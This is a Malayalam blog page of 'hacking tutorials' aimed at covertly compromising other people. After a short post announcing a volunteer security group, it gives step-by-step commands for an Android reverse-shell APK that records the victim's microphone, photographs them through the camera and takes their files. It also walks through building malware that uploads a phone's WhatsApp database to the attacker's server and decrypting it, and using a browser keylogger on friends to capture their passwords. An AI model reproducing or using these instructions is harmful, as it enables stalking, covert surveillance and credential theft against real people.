Showing posts with label Hacking Tutorials. Show all posts

സ്വതന്ത്ര ഹാക്കിംഗ് പ്രസ്ഥാനത്തിനു തുടക്കം


നിത്യ ജീവിതത്തില്‍ ഒഴിവാക്കാന്‍ കഴിയാത്ത ഘടകമായി ഇന്റര്‍നെറ്റ് തീര്‍ന്നിരിക്കുകയാണെങ്കിലും സൈബര്‍ സുരക്ഷ സംബന്ധിച്ചു പൊതുജനങ്ങളുടെയിടയില്‍ കാര്യമായ ധാരണ ഇപ്പോഴുമില്ല.
ഇന്റര്‍നെറ്റിന്റെ മറവില്‍ പതിയിരിക്കുന്ന കെണികള്‍ സംബന്ധിച്ചു പൊതുജനങ്ങളെ ജാഗരൂകരാക്കുകയെന്ന ലക്ഷ്യത്തില്‍ കേരളത്തിലെ എത്തിക്കല്‍ ഹാക്കര്‍മാര്‍, പേനട്രേഷന്‍ ടെസ്റ്റര്‍മാര്‍, കോഡര്‍മാര്‍, കമ്പ്യൂട്ടര്‍ സയന്‍സ് വിദ്യാര്‍ഥികള്‍ എന്നിങ്ങനെ  സൈബര്‍ സെക്യൂരിറ്റിയില്‍ താല്പര്യം ഉള്ളവരെ ഉള്‍പ്പെടുത്തിക്കൊണ്ട് ഒരു സ്വതന്ത്ര ഹാക്കിംഗ് പ്രസ്ഥാനത്തിനു തുടക്കം കുറിക്കാന്‍ ആലോചിക്കുന്നു. പ്രധാനമായും നമ്മുടെ അറിവുകള്‍ സമൂഹനന്മയ്ക്കായി എങ്ങനെ ഉപയോഗിക്കാനാവും എന്ന് നമുക്ക് ഇവിടെ ചിന്തിക്കാം.
• ഇന്റര്‍നെറ്റില്‍ വ്യാപകമായിക്കൊണ്ടിരിക്കുന്ന തട്ടിപ്പുകള്‍ നിങ്ങളുടെ ശ്രദ്ധയില്‍ പെടുകയാണെങ്കില്‍ അത് ഞങ്ങളെ അറിയിക്കാവുന്നതാണ്. ഈ വിവരം കൂടുതല്‍ ആളുകളിലേക്ക് എത്തിക്കാന്‍ അത് സഹായിക്കും.
• ഇത് ഒരിക്കലും ഒരു വ്യക്തിയാല്‍ അധിഷ്ഠിതമല്ല. മറിച്ച് ഒരു കൂട്ടം യുവാക്കളുടെ അറിവും കഴിവുകളും കോര്‍ത്തിണക്കിയ ഒരു സംരഭം ആണ്.
• ഈ ഗ്രൂപ്പില്‍ ഉള്ളവര്‍ ഒരിക്കലും സ്വന്തം താല്പര്യങ്ങള്‍ക്ക് വേണ്ടി സഹായം അഭ്യര്‍ത്ഥിച്ചു വരുന്നവര്‍ക്ക് നഷനഷ്ട്ങ്ങള്‍ വരുത്തുവാന്‍ പാടുള്ളതല്ല.
• KHW നല്‍കിയ വെരിഫൈഡ് ബാഡ്ജ് ഉള്ളവര്‍ക്ക് (white hat) മാത്രമേ മറ്റുള്ളവരെ വിദൂരമായി സഹായിക്കാന്‍ അര്‍ഹതയുള്ളു
• സഹായം അഭ്യര്‍ഥിക്കുന്നവര്‍ ഓണ്‍ലൈന്‍ മുഖേന മാത്രം സഹായം അപേക്ഷിക്കുക. അല്ലാത്ത പക്ഷം അവര്‍ക്ക് നു ഉണ്ടാകുന്ന നഷനഷ്ടങ്ങള്‍ക്ക് KHW ഉത്തരവാദി ആയിരിക്കുന്നതല്ല.
• സോഷ്യല്‍ മീഡിയ അക്കൌണ്ടുകള്‍ ഹാക്ക് ചെയ്തു തരണം എന്ന തരത്തില്‍ ഉള്ള അപേക്ഷകള്‍ ഞങ്ങള്‍ സീകരിക്കുന്നതല്ല.
• സമുഹത്തെ മോശമായി ബാധിക്കുന്ന തരത്തിലുഉള്ള വര്‍ഗീയത വളര്‍ത്തുന്ന പോസ്റ്കള്‍, ചിത്രങ്ങള്‍, വോയിസ്‌ റെക്കോര്‍ഡ്കള്‍, വീഡിയോകള്‍, വെബ്സൈറ്റ്കള്‍ എന്നിവ ടേക്ക് ഡൌണ്‍ ചെയ്യാനുള്ള സഹായത്തിനായി നിങ്ങള്‍ക്ക് ഞങ്ങളെ സമീപിക്കാം.
• സുതാര്യമായ ഒരു സാമുഹിക സേവനം എന്ന നിലയില്‍ ആണ് ഞങ്ങള്‍ പ്രവര്‍ത്തിക്കുന്നത്.
• നിങ്ങള്‍ എങ്ങനെയാണ് ഹാക്ക് ചെയ്യപെടുന്നത് എനിങ്ങനെയുള്ള സംശയങ്ങള്‍ നിങ്ങള്‍ക്ക് ഉന്നയിക്കാം.
• കേരള വെബ്സൈറ്റ്കള്‍ക്ക് എതിരെയുള്ള ഹാക്കിംഗ് ആക്രമങ്ങള്‍ ചെറുക്കാന്‍, അവയില്‍ കണ്ടുവരുന്ന സുരക്ഷാ പാളിച്ചകള്‍ എന്നിവ നിങ്ങള്‍ക്ക് ഞങ്ങളെ സ്വകാര്യമായി അറിക്കാം.
• സ്‌ത്രീകള്‍ക്ക്‌ എതിരെയുള്ള കടന്നുകയറ്റം, അശീല ചുവയുള്ള ചാറ്റ്, ഭീഷണിപ്പെടുത്തല്‍ തുടങ്ങിയവ നിങ്ങള്‍ക്ക് സ്വന്തമായി ഈ സമുഹത്തെ അറിയിക്കാം. അവരെ ഒറ്റ പെടുത്താനും, ഒരു നല്ല സമുഹത്തെ വാര്‍ത്തെടുക്കാന്‍ വേണ്ടി ഞങ്ങളാല്‍ കഴിയുന്ന സഹായം ചെയ്തു തരുന്നതാണ്.
ഇപ്പോള്‍ തന്നെ ജോയിന്‍ ചെയ്യാന്‍ സന്ദര്‍ശിക്കുക http://goo.gl/sILepc

ആന്‍ഡ്രോയിഡ് ഫോണ്‍ ഹാക്ക് ചെയ്യുന്നത് എങ്ങനെ ?


ഇപ്പോള്‍ സാധാരണമായി  ഉപയോഗിച്ചുവരുന്ന സ്മാര്‍ട്ട്‌ ഫോണുകളില്‍ ഭൂരിഭാഗവും ആന്‍ഡ്രോയിഡ് അടിസ്ഥാനമാക്കി ഉള്ളതാണ്. അതുകൊണ്ടുതന്നെ ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നത് നമ്മില്‍ പലരും അന്വേഷിചിട്ടുണ്ടാവും. ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നാണ് ഈ പോസ്റ്റിലുടെ ഞാന്‍ പറയുവാന്‍ പോകുന്നത്. ഇവിടെ ഞാന്‍ ഉപയോഗിക്കുന്നത് മെറ്റാസ്പ്ലോയിറ്റ് എന്ന ഒരു സോഫ്റ്റ്‌വെയര്‍ ആണ്. ഇതിനെപ്പറ്റി മുന്പ് വിശദമായി പോസ്റ്റ്‌ ചെയ്തിരുന്നു. ഇപ്പോള്‍ ഇതുപയോഗിച്ച് എങ്ങനെ ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ ഹാക്ക് ചെയ്യാം എന്ന് കാണാം.

ഹാക്കിംഗ് രംഗത്ത്‌ സാധാരണമായി ഉപയോഗിച്ചുവരുന്ന റിവേര്‍സ് TCP (Reverse TCP) എന്ന രീതി അന്ന് ഞാന്‍ ഇവിടെ ഉപയോഗിക്കുന്നത്. അതായത്. നമ്മള്‍ മെറ്റാസ്പ്ലോയിറ്റ് ഉപയോഗിച്ച് ഒരു പേലോഡ് നിര്‍മിക്കുകയും അത്  മൊബൈല്‍ ഫോണില്‍ execute ചെയ്യുമ്പോള്‍ നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഒരു കണക്ഷന്‍ സൃഷ്ടിക്കപ്പെടുകയും ചെയ്യുന്നു. ഈ കണക്ഷന്‍ മുഖേന ആ ഫോണിലെ വിവരങ്ങള്‍ നമുക്ക് ലഭ്യമാകുകയും ചെയ്യുന്നു.

ഇനി ഇത് എങ്ങനെ ചെയ്യാം എന്ന് നോക്കാം.

ആദ്യം ലിനക്സില്‍ ഒരു ടെര്‍മിനല്‍ വിന്‍ഡോ തുറക്കുക. (അതിനായി  Ctrl+Alt+T എന്ന ഷോര്‍ട്ട് കട്ട് ഉപയോഗിച്ചാല്‍ മതിയാവും)
അതിനുശേഷം താഴെക്കാണുന്ന രീതിയില്‍ command ടൈപ്പ് ചെയ്യുക.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker ip adress>
 LPORT=<port number> R > hack.apk
ഇവിടെ attacker ip adress എന്ന ഭാഗത്ത്‌ നമ്മുടെ ഐ പി അഡ്രസ്സും, port number എന്ന ഭാഗത്ത് നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷന്‍ വരേണ്ട പോര്‍ട്ടിന്റെ നമ്പറും കൊടുക്കുക. (ചിത്രം കാണുക)


ഇവിടെ എന്റെ ഐ പി അഡ്രെസ്സ് 192.168.8.94 ഉം പോര്‍ട്ട്‌ നമ്പര്‍ 443 ഉം ആണ്.
(നിങ്ങളുടെ ഐ പി അഡ്രെസ്സ് അറിയുവാനായി ലിനക്സ്‌ ടെര്‍മിനലില്‍ ifconfig എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ മതി.)

ഇപ്പോള്‍ നിങ്ങളുടെ ഡസ്ക് ടോപ്പില്‍   hack.apk എന്ന ഒരു ഫയല്‍ കാണാം. ഇതാണ് നമ്മുടെ പേലോഡ് ഉള്ള ഫയല്‍. ഇത് നമുക്ക് ഹാക്ക് ചെയ്യേണ്ട ഫോണില്‍ റണ്‍ ചെയ്യണം. നേരിട്ടോ ഇന്റര്‍നെറ്റ്‌ വഴിയോ മറ്റെന്തെങ്കിലും മാര്‍ഗത്തിലൂടെയോ നമുക്ക് ഇത് ചെയ്യാം. ( അത് നിങ്ങളുടെ കഴിവ് പോലെ ;) )

ഇനി അത് ഫോണില്‍ റണ്‍ ചെയ്യുമ്പോള്‍ നമ്മുടെ കംപ്യൂട്ടറിലേക്ക് വരുന്ന കണക്ഷനെ എങ്ങനെ കൈകാര്യം ചെയ്യാം എന്ന് നോക്കാം.
അതിനായി msfconsole തുറക്കുക. (ടെര്‍മിനലില്‍ അത് ടൈപ്പ് ചെയ്ത് എന്റര്‍ അമര്‍ത്തിയാല്‍ മതി)
ഇനി താഴെ കാണുന്ന കമാന്‍ഡ് ടൈപ്പ് ചെയ്യുക.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
ഇനി മുന്പ് ചെയ്തതുപോലെ LHOSTഉം LPORTഉം സെറ്റ് ചെയ്യുക. (ചിത്രം കാണുക)



പിന്നെ കണക്ഷനുകള്‍ സ്വീകരിക്കാനായി exploit എന്ന കമാന്‍ഡ് കൂടി കൊടുക്കുക.
ഇപ്പോള്‍ മുന്പ് നമ്മള്‍ നല്‍കിയ പോര്ട്ടിലേക്ക് എന്തെങ്കിലും കണക്ഷനുകള്‍ വരുന്നുണ്ടോ എന്ന് കമ്പ്യൂട്ടര്‍ ശ്രദ്ധിക്കുകയായിരിക്കും.

ഈ സമയത്ത് നമ്മുടെ മുന്‍പത്തെ ആ apk ഫയല്‍ ഫോണില്‍ തുറക്കുക. അപ്പോള്‍ ഫോണില്‍ ഒരു വലിയ ബട്ടന്‍ കാണാം. അത് അമര്‍ത്തുക (അല്ലെങ്കില്‍ അമര്തിപ്പിക്കുക :p ) 

അപ്പോള്‍ നിങ്ങളുടെ സ്ക്രീനില്‍ ഇങ്ങനെ ചിലത് കാണാന്‍ കഴിയും (ചിത്രം കാണുക)


ഇപ്പോള്‍ ഫോണില്‍നിന്നുള്ള കണക്ഷന്‍ കമ്പ്യൂട്ടറില്‍ എത്തിക്കഴിഞ്ഞിരിക്കുന്നു.

ഇനി നമുക്ക് ആ ഫോണിനെ ചൂഷണം ചെയ്യാന്‍ ആരംഭിക്കാം :p

ഉദാഹരണങ്ങള്‍:

ആ ഫോണിന്റെ വിവരങ്ങള്‍ അറിയാന്‍ sysinfo എന്ന കമാന്‍ഡ് ഉപയോഗിക്കുക.

ഫോണിന്റെ മൈക്രോഫോണ്‍ ഉപയോഗിച്ച് ശബ്ദം റെക്കോര്‍ഡ്‌ ചെയ്യാന്‍ record_mic എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം.

ആ ഫോണിന്റെ ക്യാമറ ഉപയോഗിച്ച് ഫോട്ടോ എടുക്കുവാനായി webcam_snap 1 എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം. ഇനി മുന്‍പിലുള്ള ക്യാമറ ഉപയോഗിച്ചുള്ള ഫോട്ടോ ആണ് വേണ്ടത് എങ്കില്‍ webcam_snap 2 എന്ന് കൊടുത്താല്‍ മതി. ഫോട്ടോ ഡസ്ക്ടോപ്പില്‍ നോക്കിയാല്‍ കാണാം  (ചിത്രം കാണുക.)

ഇതുപയോഗിച്ച് ആ ഫോണിലെ ഫയലുകളും സോഫ്റ്റ്‌വെയറുകളും മറ്റു വിവരങ്ങളും നമുക്ക് കാണാന്‍ സാധിക്കും. അത് റൂട്ട് ചെയ്യാത്ത ഫോണ്‍ ആണെങ്കില്‍ ചില പരിമിതികള്‍ ഉണ്ടാവും എന്ന് മാത്രം.

ഇനി ആ ഫോണില്‍ നിന്ന് ഫയലുകള്‍ എങ്ങനെ അടിച്ചുമാറ്റാം എന്ന് നോക്കാം.

  • ls എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ നിലവിലുള്ള ഫോള്‍ഡര്‍ ഇല്‍ ഉള്ള ഫയലുകളുടെ ലിസ്റ്റ് കാണാം.
  • cd എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ മറ്റൊരു ഫോള്‍ഡര്‍ ലേക്ക് പോകാം. ഉദാ: cd /images/mohanlal
  • ഫയലുകള്‍ നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ download filename എന്ന് കൊടുത്താല്‍ മതി. ഉദാ: download image.jpg
  • ഫോള്‍ഡര്‍ നിര്‍മിക്കാന്‍ mkdir എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം ഉദാ: mkdir sasi
  • ഫോണിലേക്ക് ഒരു ഫയല്‍ അപ്‌ലോഡ്‌ ചെയ്യാന്‍ upload കമാന്‍ഡ് ഉപയോഗിക്കാം. ഉദാ: upload video.mp4

ഈ പോസ്റ്റ്‌ നിങ്ങള്‍ക്ക് ഉപയോഗപ്രദമായി എന്ന് കരുതുന്നു. അഭിപ്രായങ്ങള്‍ താഴെ രേഖപ്പെടുത്തുക.

വാട്ട്സ്ആപ്പ് ഹാക്ക് ചെയ്യാം

ആന്‍ഡ്രോയ്ഡില്‍ വാട്ട്സ്ആപ്പ് മെസ്സേജുകള്‍ ഹാക്ക് ചെയ്യുന്നത് എങ്ങനെ എന്ന് ഈ പോസ്റ്റില്‍ കാണാം.

വാട്ട്സ്ആപ്പ് ഡാറ്റാബേസിനെപ്പറ്റി അറിയാത്തവര്‍ക്കായി ഒരു ചെറിയ ആമുഖം.

വാട്ട്സ്ആപ്പില്‍ ഒരാള്‍ അയക്കുന്നതും അയാള്‍ക്ക് ലഭിക്കുന്നതും ആയ എല്ലാ മെസ്സേജുകളും ഒരു ഡാറ്റാബേസിലാണ് സൂക്ഷിച്ചു വെക്കുന്നത്. ഈ ഡാറ്റാബേസ് നമ്മുടെ ഫോണിന്റെ SD കാര്‍ഡില്‍ ആയിരിക്കും സേവ് ചെയ്തിട്ടുണ്ടാകുക. അതായത് ഈ മെസ്സേജുകള്‍ SD കാര്‍ഡ് വിവരങ്ങള്‍ വായിക്കാനാകുന്ന ഇതൊരു ആപ്ലിക്കേഷനും വയിക്കനാകും. ചാറ്റ്  ഡാറ്റാബേസ് SD കാര്‍ഡില്‍ Whatsapp എന്ന ഫോള്‍ഡറില്‍ msgstore.db.crypt5  എന്ന പേരില്‍  ആണ് ഉണ്ടാവുക.  ഇന്ന് എല്ലാവരും ധാരാളം അപ്ലിക്കേഷനുകളും ഗെയിമുകളും ഫോണില്‍ ഉപയോഗിക്കാറുണ്ടല്ലോ ? അതുകൊണ്ടുതന്നെ വാട്ട്സ്ആപ്പ് മെസ്സേജുകള്‍ 'അടിച്ചുമാറ്റുക' എന്നത് അത്ര വിഷമകരമായ ഒരു കാര്യമാണെന് തോന്നുന്നില്ല. ഒരു ആന്‍ഡ്രോയ്ഡ് മാല്വെയര്‍ഉപയോഗിച്ചാല്‍ വളരെ എളുപ്പത്തില്‍ ഇത് ചെയ്യാനാവും.

ഇനി നമുക്ക് ആ മാല്‍വെയര്‍ എങ്ങനെ ഉണ്ടാക്കാം എന്ന് നോക്കാം.

ഇതിനായി നമുക്ക് വേണ്ടത് :

1) ആന്‍ഡ്രോയ്ഡ് SDK ടൂള്‍കിറ്റ് - ഇവിടെ
2) മാല്‍വെയര്‍ കോഡ് - ഇവിടെ
3) സെര്‍വറില്‍ ഡാറ്റാബേസ് സേവ് ചെയ്യാനുള്ള പി എച് പി സ്ക്രിപ്റ്റ്- ഇവിടെ


ആദ്യം ആന്‍ഡ്രോയ്ഡ് SDK ടൂള്‍കിറ്റ് ക്രമീകരിക്കുക. (സഹായത്തിനായി ഈ ലിങ്ക് നോക്കുക ) ഇനി കമ്പ്യൂട്ടറില്‍ eclipse തുറക്കുക. നമുക്ക് source code importചെയ്ത് അത് compile ചെയ്യേണ്ടതുണ്ട്. ഇനി File മെനുവില്‍ Import ക്ലിക്ക് ചെയ്യുക. അതിനുശേഷം Android > Existing Android Code Into Workspace തിരഞ്ഞെടുക്കുക.


ഇനി Next ക്ലിക്ക് ചെയ്ത് മുന്പ് ഡൌണ്‍ലോഡ് ചെയ്ത source code ഫോള്‍ഡര്‍ തിരഞ്ഞെടുക്കുക. (ഡൌണ്‍ലോഡ് ചെയ്ത ഫയലിലെ WAS എന്ന ഫോള്‍ഡര്‍)

ഇനി ഇടതുവശത്തെ Package Explorer ല്‍ AndroidManifest.xml എന്ന ഫയല്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്ത് തുറക്കുക. ഈ ഫയലില്‍ ആണ് നമുക്ക് ആപ്ലിക്കേഷന്‍ പെര്മിഷനുകള്‍ സെറ്റ് ചെയ്യേണ്ടത്. (network access, SD Card access etc )

ഇവിടെ നമ്മുടെ അപ്ലിക്കേഷന് മൂന്നു പെര്മിഷനുകള്‍ ആവശ്യമായതായി കാണാം.



1) READ_EXTERNAL_STORAGE - SD കാര്‍ഡിലെ വിവരങ്ങള്‍ വായിക്കുവാന്‍ വേണ്ടി.
2) INTERNET - ഇന്റര്‍നെറ്റ്‌ കണക്ഷന്‍ ഉപയോഗിച്ച് ഡാറ്റാബേസ് സെര്‍വറിലേക്ക് അയക്കാന്‍ വേണ്ടി.
3) GET_ACCOUNTS - ആ ആന്‍ഡ്രോയ്ഡ് ഫോണില്‍ ഉപയോഗിക്കുന്ന ഗൂഗിള്‍ അക്കൗണ്ട്‌ ഏതാണെന്ന് അറിയാനായി.

package explorer ല്‍ SRC യില്‍ നോക്കിയാല്‍ ഈ അപ്ലിക്കേഷന്‍റെ source code കാണാന്‍ കഴിയും. നമ്മുടെ അപ്ലിക്കേഷന്‍ compile ചെയ്യുന്നതിന് മുന്പ് വിവരങ്ങള്‍ അയക്കേണ്ട സെര്‍വറിന്‍റെ വിവരങ്ങള്‍ കൂടെ ഇതില്‍ ചേര്‍ക്കേണ്ടതുണ്ട്. അതിനായി ആദ്യം നമ്മുടെ കൈവശമുള്ള പി എച്ച് പി സ്ക്രിപ്റ്റ് ഒരു സെര്‍വെറിലേക്ക് അപ്‌ലോഡ്‌ ചെയ്യുക. അതിനുശേഷം നമ്മുടെ സ്ക്രിപ്റ്റ് url അപ്ലിക്കേഷനില്‍ ചേര്‍ക്കുക. (ഉദാ: http://script.xybersec.org/whatsapp.php)

 അതിനായി res>values>string.xml എന്ന ഫയലില്‍ പോയതിനു ശേഷം  ur1 string എന്ന ഭാഗത്ത് നിങ്ങളുടെ url ടൈപ്പ് ചെയ്യുക.



ഇനി file>  export ക്ലിക്ക് ചെയ്തു export android application ക്ലിക്ക് ചെയ്യുക.


അപ്ലിക്കേഷന്‍ compile ചെയ്യുന്നതിന് മുന്പ് നമുക്ക് ഒരു keystore ഉണ്ടാക്കേണ്ടതുണ്ട്. അതുകൊണ്ട് അടുത്ത dialog box ല്‍ ഒരു locationഉം പാസ്സ്‌വേര്‍ഡും കൊടുക്കുക. ഇനി next അമര്‍ത്തുക.

അപ്പോള്‍ key creation എന്ന ഒരു ബോക്സ്‌ കാണാം. അതില്‍ validity 25 എന്നും ബാക്കി ഉള്ളതെല്ലാം ഇഷ്ടാനുസരണവും നല്‍കുക.

ഇനി അടുത്ത പടിയായി നമ്മുടെ അപ്ലിക്കേഷന്‍ എന്തെങ്കിലും.apk എന്ന രീതിയില്‍ പേര് കൊടുത്തു സേവ് ചെയ്യുക.

ഇനി ഈ apk ഏതെങ്കിലുംവാട്ട്സ്ആപ്പ് ഉള്ള ആന്‍ഡ്രോയ്ഡ് ഫോണില്‍ ഇന്‍സ്റ്റോള്‍ ചെയ്ത് ഓപ്പണ്‍ ചെയ്ത് നോക്കുക. ഫോണിലെ ഇന്റെര്നെറ്റിന്റെ വേഗത അനുസരിച്ച് അല്‍പ്പസമയത്തിനുള്ളില്‍ നിങ്ങളുടെ സെര്‍വറില്‍ ചാറ്റുകള്‍ എല്ലാം ഗൂഗിള്‍ അക്കൗണ്ട്‌ നെയിം ഉള്‍പ്പെടെ എത്തിയിട്ടുണ്ടാകും.

ഇനി ഈ മെസ്സജുകള്‍ എങ്ങനെ വായിക്കാം എന്ന് നോക്കാം. ;)

അതിനായി ഈ Github ലിങ്കില്‍ ഉള്ള python സ്ക്രിപ്റ്റ് ഉപയോഗിച്ചാല്‍ മതിയാവും. - https://github.com/aramosf/pwncrypt5/blob/master/pwncrypt5.py


ഇനി അതിനു മടി ആണെങ്കില്‍ http://www.recovermessages.com/ എന്ന വെബ്‌സൈറ്റില്‍ ഡാറ്റാബേസ് ഫയല്‍ അപ്‌ലോഡ്‌ ചെയ്താല്‍ മെസ്സേജുകള്‍ എല്ലാം നമുക്ക് (അവര്‍ക്കും :p ) വായിക്കാനാവും.

ഇനി ഇത് സ്ക്രിപ്റ്റ് ഉപയോഗിച്ച് ലിനക്സില്‍ എങ്ങനെ തുറക്കാം എന്ന് നോക്കാം.

അതിനായി ഡാറ്റാബേസ് ഫയലും python സ്ക്രിപ്റ്റും ഒരു ഫോള്‍ഡറില്‍ സേവ് ചെയ്യുക.

ഇനി ടെര്‍മിനല്‍ തുറന്ന് സേവ് ചെയ്ത ഫോള്‍ഡറിലേക്ക് working directory മാറ്റുക.

root@melbin:~/Desktop# cd whatsapp

ഇനി താഴെ പറയുന്ന കമാന്‍ഡ് ഉപയോഗിച്ച് മെസ്സേജുകള്‍ decrypt ചെയ്യാം

root@melbin:~/Desktop/whatsapp# python script.py msgstore.db.crypt5 gmailaccountid of victim@gmail.com msgstore.sdb

ഇവിടെ 'gmailaccountid of victim@gmail.com' എന്നത് മാറ്റി ഹാക്ക് ചെയ്യപ്പെട്ട ആളുടെ id ആക്കുക.

ഇപ്പോള്‍ msgstore.sdb എന്ന ഒരു ഫയല്‍ അതേ ഫോള്‍ഡറില്‍ കാണാന്‍ കഴിയും. അത് വായിക്കാനായി ഈ ലിങ്കിലുള്ള അപ്ലിക്കേഷന്‍ ഡൌണ്‍ലോഡ് ചെയ്യുക.

ഇനി ആ ഫോള്‍ഡര്‍ extract ചെയ്യുക. അതിലേക്ക് msgstore.sdb കോപ്പി ചെയ്യുക.

ഇനി താഴെ പറയുന്ന കമാന്‍ഡ് ഉപയോഗിക്കുക.

root@melbin:~/Desktop/chat# python whatsapp_xtract.py msgstore.sdb –o whatsapp.html

ഇപ്പോള്‍ ആ ഫോള്‍ഡറില്‍ തന്നെ whatsapp.html എന്ന ഫയലില്‍ നിങ്ങള്‍ക്ക് ആവശ്യമായ ചാറ്റുകള്‍ എല്ലാം ഉണ്ടാവും :P വെറും ചാറ്റ് മാത്രമല്ല. വീഡിയോകളും ചിത്രങ്ങളും ഉള്‍പ്പെടെ. :)

എങ്ങനെയാണു ഒരു ഫേസ്ബുക്ക് അക്കൗണ്ട്‌ ഹാക്ക് ചെയ്യുക


ആദ്യം നിങ്ങള്‍ അറിയണം എങ്ങനെയാണു ഒരു ഫേസ്ബുക്ക് അക്കൗണ്ട്‌ ഹാക്ക് ചെയ്യുക എന്നത്.

ഫേസ്ബുക്ക്‌ ഹാക്ക് ചെയ്യുന്നത് പല തരത്തില്‍ ആണ്.

  • പിഷിംഗ്,
  • കീ ലോഗ്ഗിന്‍,
  • ബ്രുട്ട് ഫോഴ്സ്,
  • കൂകി സ്റ്റീല്ലിംഗ്

ഇത്തരം വഴിയിലുടെ മാത്രമേ ഒരു ഫേസ്ബുക്ക് അക്കൗണ്ട്‌ ഹാക്ക് ചെയ്യാന്‍ കഴിയു എന്നാല്‍ അങ്ങനെ ചെയ്യുമ്പോള്‍ ഒന്നെങ്കില്‍ ഗൂഗിള്‍, ആന്റി വൈറസ്‌, ബ്രൌസര്‍ ഇവയെല്ലാം ( പിഷിംഗ്, കീ ലോഗ്ഗിന്‍, ബ്രുട്ട് ഫോഴ്സ്, കൂകി സ്റ്റീല്‍) ഇത്തരം പ്രവര്‍ത്തികള്‍ പിടിക്കും

എന്നാല്‍ ആരും അറിയാതെ ഇത്തരം ഓണ്‍ലൈന്‍ അക്കൗണ്ട്‌കള്‍. ഹാക്ക് ചെയ്യാന്‍ പറ്റുന്ന ടൂള്‍ ആണ്. Xenotix Keylogger

ഇനി പറയാം എന്താണ് Xenotix Keylogger?

OWASP is an Open community of Application Security Professionals.  എന്ന ഒരു ഓപ്പണ്‍ കമ്മ്യൂണിറ്റിയില്‍ വര്‍ക്ക്‌ ചെയുന്ന മലയാളി ഹാക്കര്‍ ആയ അജിന്‍ എബ്രഹാം നിര്‍മിച്ച ഒരു സെക്യൂരിറ്റി ടൂള്‍ ആണ് Xenotix Keylogger

ഈ Xenotix Keylogger മോസില ഫയര്‍ ഫോക്സ്ല്‍ വര്‍ക്ക്‌ ചെയ്യുന്ന ഒരു ആഡ് ഓണ്‍ ആയിട്ടാണ് നിര്‍മ്മിച്ചിരിക്കുന്നത് ആയതിനാല്‍ വളരെ സിമ്പിള്‍ ആയി ഒരാളുടെ ബ്രൌസറില്‍ ടൈപ്പ് ചെയുന്ന എല്ലാ ഇന്പുട്ട് ടെക്സ്റ്റ്‌കള്‍ ഒരു ലോഗ് ഫയല്‍ ആയി സേവ് ചെയ്യാന്‍ കഴിയുന്ന തരത്തില്‍ ആണ് ഇതിന്‍റെ വര്‍ക്കിംഗ്‌

ഇനി എങ്ങനെയാണ് ഈ കീ ലോഗ്ഗേര്‍ കോണ്ഫിഗ് ചെയ്യുക എന്ന നോക്കാം.

ആദ്യം ഈ മോസില്ല ആഡ് ഓണ്‍ ഡൌണ്‍ലോഡ് ചെയ്യുക.

https://addons.mozilla.org/en-US/firefox/addon/xenotix-keylogger/

http://opensecurity.in/downloads/xenotix_keylog_x-3.0.xpi

എനിട്ട് ഇന്‍സ്റ്റോള്‍ ചെയ്യുക അത് കഴിഞ്ഞാല്‍ ഫയര്‍ഫോക്സ് റീ സ്റ്റാര്‍ട്ട്‌ ചെയ്യാനുള്ള അനുവാദം ചോതിക്കും. അപ്പോള്‍  റീ സ്റ്റാര്‍ട്ട്‌ ചെയ്യുക

തുറന്നു വരുന്ന ബ്രൌസറില്‍ നിങ്ങള്‍ ഒരു പാസ്സ്‌വേര്‍ഡ്‌ സെറ്റ് ചെയ്യാനുള്ള ബോക്സ്‌ വരും അപ്പോള്‍ ഇഷ്ട്ടപെട്ട പാസ്സ്‌വേര്‍ഡ്‌ അവിടെ നല്‍കുക ഇനി നിങ്ങള്‍ ആ ബ്രൌസര്‍ സ്വന്തം സുഹൃത്തുക്കള്‍ക്ക് ഉപയോഗിക്കാന്‍ നല്‍കുക. അവര്‍ അവര്‍ക്ക് ഇഷ്ട്ട്ടമുള്ള സോഷ്യല്‍ നെറ്റ്‌വര്‍ക്ക്കളില്‍ കയറട്ടെ എല്ലാംതന്നെ ലോഗ് ചെയ്തു വെക്കുന്നുണ്ടാകും

ഈ ലോഗ് ചെയ്ത വിവരങ്ങള്‍ കിട്ടാന്‍

ALT+SHIFT+\

keyboard

എന്നി കീ കള്‍ ഒരുമിച്ചു പ്രസ്‌ ചെയ്താല്‍ ഉടന്‍ നിങ്ങളോട് മുന്പ്സെറ്റ് ചെയ്ത പാസ്സ്‌വേര്‍ഡ്‌ ചോദിക്കും അത് അവിടെ ടൈപ്പ് ചെയ്ത് ലോഗിന്‍ ചെയ്താല്‍ ഉണ്ടെന് തന്നെ നിങ്ങള്‍ക്ക് ലോഗ് ചെയ്ത് വെച്ച കീസ്ട്രോക്ക്കള്‍ കാണാവുന്നതാണ്‌

ഇതിന്‍റെ തന്നെ മറ്റൊരു വെര്‍ഷന്‍ വെച്ച് ഒരു റിമോട്ട് കമ്പ്യൂട്ടര്‍ലെ സകല കീ സ്ട്രോക്ക്കള്‍ ലോഗ് ചെയ്യാന്‍ കഴിയും.

എങ്ങനെയാണ് ഒരു റിമോട്ട് കമ്പ്യൂട്ടര്‍ ഹാക്ക് ചെയ്യുന്നത്


